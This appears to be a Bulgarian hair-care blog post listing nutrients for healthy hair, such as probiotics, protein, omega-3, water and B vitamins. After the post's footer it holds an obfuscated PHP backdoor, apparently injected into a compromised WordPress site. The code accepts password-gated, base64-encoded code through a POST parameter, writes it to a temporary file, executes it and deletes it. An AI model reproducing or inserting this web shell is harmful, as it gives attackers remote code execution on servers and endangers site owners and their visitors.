Ако искате здрава коса, трябва да приемате следните вещества: | Косопад

Ако искате здрава коса, трябва да приемате следните вещества:

kosa-rastej-luna

За да имате красива коса, не само трябва да мислите за продуктите, които използвате, но и за храната, която консумирате.

Ето какви хранителни вещества и витамини трябва да приемате, за да е здрава и красива косата ви:

Пробиотици

Ще направят косата ви много по- силна и по- малко чуплива. Причината е, че космените фоликули усвояват хранителните вещества, които пробиотиците ни доставят и помагат да бактериите да се развиват в организма. Подходящи храни, съдържащи пробиотици, са кисело мляко, мисо, кефир и пр.

proteini-dietite

Протеини

Помагат на косата да расте много по- бързо. Това се дължи на хормоналният баланс, който се случва, след като започнете да ги консумирате. Протеините са част от структурата на косъма и липсата им, го кара по- лесно да се къса и да е без блясък.

Консумирайте млечни продукти, месо, риба и пр, за повече протеини.

Омега- 3 мастни киселини

Ще направят косата ви много по- силна, по- плътна. Яжте риба, орехи, зелени зеленчуци, и пр.

Вода

Пийте повече вода. Това ще помогне на косата ви да се разресва по- лесно и да има по- малко статично електричество. Пречиства от токсините и така улеснява растежа.

Витамини В- комплекс

Правят косата по- здрава и силна, особено биотина.

18. юли 2016 10:15:46 от Надя Колева
Категории: Косопад – Статии | Етикети: , , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}